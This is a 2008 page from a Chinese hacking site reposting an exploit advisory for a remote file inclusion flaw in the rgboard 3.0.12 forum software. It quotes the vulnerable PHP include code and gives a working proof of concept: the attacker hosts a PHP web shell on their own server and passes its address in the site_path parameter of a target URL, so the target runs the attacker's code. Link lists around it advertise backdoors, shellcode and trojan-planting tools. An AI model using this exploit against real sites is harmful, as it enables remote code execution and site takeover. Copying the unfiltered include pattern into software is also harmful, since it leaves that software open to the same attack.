·	rgboard 3.0.12 远程文件	05-08	·	迅雷本地溢出POC	05-08
·	perl后门,正向和反向	05-08	·	嘉英网提供50-1000M免费	05-08
·	掌控Vista从控制面板说起	05-07	·	XP系统桌面主题搬家小技	05-07
·	把Windows 2008 RC1配置	05-07	·	用WinPE备份Windows Vis	05-07
·	无限网络免费硬盘-易上传	05-07	·	火网数据中心提供30M免费	05-07
·	新思路用Gene恢复系统管	05-06	·	虫网磁盘100M免费网络硬	05-06
·	天寻网络提供30-100M免费	05-06	·	Windows Server 2008使用	05-05
·	51.com提供1000M网络免费	05-05	·	站长扶持计划---站长中国	05-05
·	WordPress Cookie完整性	05-04	·	WordPress wpSS插件ss_i	05-04
·	Oblog漏洞五一重现	05-04	·	跨站脚本－攻击和防御指	05-04
·	两个shellcode	05-04	·	代理工具：CTProxy 1.0	05-04
·	强悍挂马工具：IIS_AD I	05-04	·	Windows XP with SP3 VO	05-04
·	易美网络提供1000M网络免	05-04	·	终点免费空间提供100M免	05-04
·	Vista中新增命令完整版	05-01	·	Windows系统中的“普通人	05-01

[推荐]rgboard 3.0.12 远程文件包含漏洞

荐 ★★★★★

rgboard 3.0.12 远程文件包含漏洞

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2008-5-8 11:21:37

Infos: rgboard 3.0.12 远程文件包含漏洞
Author: Flyh4t[w.s.t]

rgboard 3.0.12 是韩国的一个论坛程序,可以用google搜索rgboard查看使用的网站
vul code:
\include\bbs.lib.inc.php：
if (!defined(’BBS_LIB_INC_INCLUDED’)) {
define(’BBS_LIB_INC_INCLUDED’, 1);
// *– BBS_LIB_INC_INCLUDED START –*
if(!$site_path) $site_path=’./’;
require_once “{$site_path}include/lib.inc.php”;
//$site_path没有过滤直接放过来包含了
poc:
在你的网站放个phpshell,目录和文件名为/include/lib.inc.php
然后访问
httP://www.目标网站.com/include/bbs.lib.inc.php?site_path=http://你的网站地址/

文章录入：cainiaowang 责任编辑：xinlian

上一篇文章：迅雷本地溢出POC

下一篇文章：没有了

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

新云CMS Online.asp页面过滤不严	02-26
对网软网上购物系统的漏洞分析	01-09
测试SQL防注入脚本	12-21
Google Xss又出跨站新漏洞	11-06
一次简单的html injection导致的	11-06
风讯、科讯漏洞利用	11-01
Adobe pdf reader URI利用方式浅	10-23
超星阅览器的最新0DAY	10-19
运用SQL Injection做数据库渗透的	09-22
sa-blog 0day	09-22
HTML注入的一些简单想法	09-10
网站登陆接口的攻与防	09-04